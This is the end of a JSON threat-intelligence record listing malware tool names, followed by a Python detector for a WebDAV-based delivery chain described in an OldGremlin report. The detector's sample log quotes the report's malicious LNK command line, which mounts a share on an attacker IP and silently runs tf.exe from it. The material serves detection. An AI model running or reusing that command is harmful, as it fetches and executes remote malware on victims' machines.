				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434170,
	"ts_updated_at": 1775792173,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d9056345b03e60f700efe8c67e0187c4975a7fb4.pdf",
		"text": "https://archive.orkl.eu/d9056345b03e60f700efe8c67e0187c4975a7fb4.txt",
		"img": "https://archive.orkl.eu/d9056345b03e60f700efe8c67e0187c4975a7fb4.jpg"
	}
}
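The LNK command lines in the IOC appendix of the archived post describe one delivery chain: `net use` against an `http://` host makes the Windows WebClient (Mini-Redirector) mount a WebDAV share, `start` opens a decoy `.docx` from `\\host\DavWWWRoot\`, and `start /b` runs `tf.exe` from the same share without a visible window. The block below is an added detection example written for this page, not code from Group-IB's post or from the OldGremlin toolset. It assumes process-creation records in a simple `time|image|command line` layout (the three sample lines are constructed; only the 192.248.176.138 host and the `Akt_sverki_Consultant.docx.lnk` command line come from the report, `fileserver01` and `updates.example.invalid` are made-up benign entries) and relies on the fact that `DavWWWRoot` is the reserved share name under which the Mini-Redirector exposes the root of a WebDAV server. The `refang()` helper lets the defanged indicators from the report (`hxxp://`, `[.]`) be fed in directly.

```python
import re

# Added example (not Group-IB's code). Flags the WebDAV delivery chain seen in the
# report's LNK command lines: "net use" against an http(s):// host, then files
# opened from \\host\DavWWWRoot\ (the reserved share name through which the Windows
# WebClient/Mini-Redirector exposes the root of a WebDAV server), one of them run
# with "start /b" (no new window).


def refang(text: str) -> str:
    """Undo the defanging used in the report (hxxp://, 192.248.176[.]138)."""
    return text.replace("hxxps://", "https://").replace("hxxp://", "http://").replace("[.]", ".")


# net use [X: | *] http(s)://host[:port][/path]  -> mounts a WebDAV share
NET_USE_WEBDAV = re.compile(
    r"\bnet\s+use\b(?:\s+(?:[A-Za-z]:|\*))?\s+(https?://[^\s&\"']+)", re.IGNORECASE)
# \\host[@SSL][@port]\DavWWWRoot\file  -> file fetched over WebDAV by the Mini-Redirector
DAV_UNC = re.compile(r"\\\\([^\\\s]+)\\DavWWWRoot\\([^\s&\"']+)", re.IGNORECASE)
START_B = re.compile(r"\bstart\s+/b\b", re.IGNORECASE)

EXEC_EXT = (".exe", ".dll", ".scr", ".hta", ".js", ".vbs", ".ps1", ".bat", ".cmd", ".msi")


def analyze_command_line(cmdline: str) -> dict:
    """Return hosts, WebDAV-served files and the reasons a command line is suspicious."""
    cmd = refang(cmdline)
    hosts, files, reasons = set(), [], []
    for m in NET_USE_WEBDAV.finditer(cmd):
        url = m.group(1)
        host = re.sub(r"^https?://", "", url, flags=re.IGNORECASE).split("/")[0].split(":")[0]
        hosts.add(host.lower())
        reasons.append(f"net use mounts WebDAV share {url}")
    for m in DAV_UNC.finditer(cmd):
        host = m.group(1).split("@")[0].lower()   # drop @SSL / @port decorations
        path = m.group(2)
        hosts.add(host)
        files.append((host, path))
        if path.lower().endswith(EXEC_EXT):
            reasons.append(f"executable {path} launched from \\\\{host}\\DavWWWRoot\\")
    if files and START_B.search(cmd):
        reasons.append("start /b runs a WebDAV-hosted file without a visible window")
    return {"suspicious": bool(reasons), "hosts": sorted(hosts), "files": files, "reasons": reasons}


# Constructed process-creation records (time|image|command line), not real telemetry.
# The second line reproduces the Akt_sverki_Consultant.docx.lnk command line from the
# report with its indicators refanged, as it would appear in Sysmon Event ID 1 or 4688.
SAMPLE_LOG = [
    "2022-03-25T09:14:02Z|C:\\Windows\\System32\\cmd.exe|cmd.exe /c net use Z: \\\\fileserver01\\finance",
    "2022-03-25T09:16:40Z|C:\\Windows\\System32\\cmd.exe|"
    "\"C:\\Windows\\System32\\cmd.exe\" /c net use http://192.248.176.138 "
    "&& start \\\\192.248.176.138\\DavWWWRoot\\DopSog_Consultant.docx "
    "&& start /b \\\\192.248.176.138\\DavWWWRoot\\tf.exe",
    "2022-03-25T09:20:11Z|C:\\Windows\\System32\\curl.exe|curl.exe -sSL https://updates.example.invalid/manifest.json",
]


def scan_log(lines) -> list:
    """Run the analyzer over time|image|cmdline records and return one alert per hit."""
    alerts = []
    for line in lines:
        time, image, cmdline = line.split("|", 2)
        result = analyze_command_line(cmdline)
        if result["suspicious"]:
            alerts.append({"time": time, "image": image, **result})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["image"], "hosts:", ", ".join(alert["hosts"]))
        for reason in alert["reasons"]:
            print("  -", reason)
```

Only the second record fires: the ordinary `net use Z: \\fileserver01\finance` has an SMB target rather than an `http://` one, and the `curl` download never touches `DavWWWRoot`. The same three signals (`net use` with a URL target, a `DavWWWRoot` UNC path, `start /b`) map directly onto a Sysmon or Windows 4688 command-line rule; the WebClient service being started on a workstation that does not normally use WebDAV is a useful corroborating event.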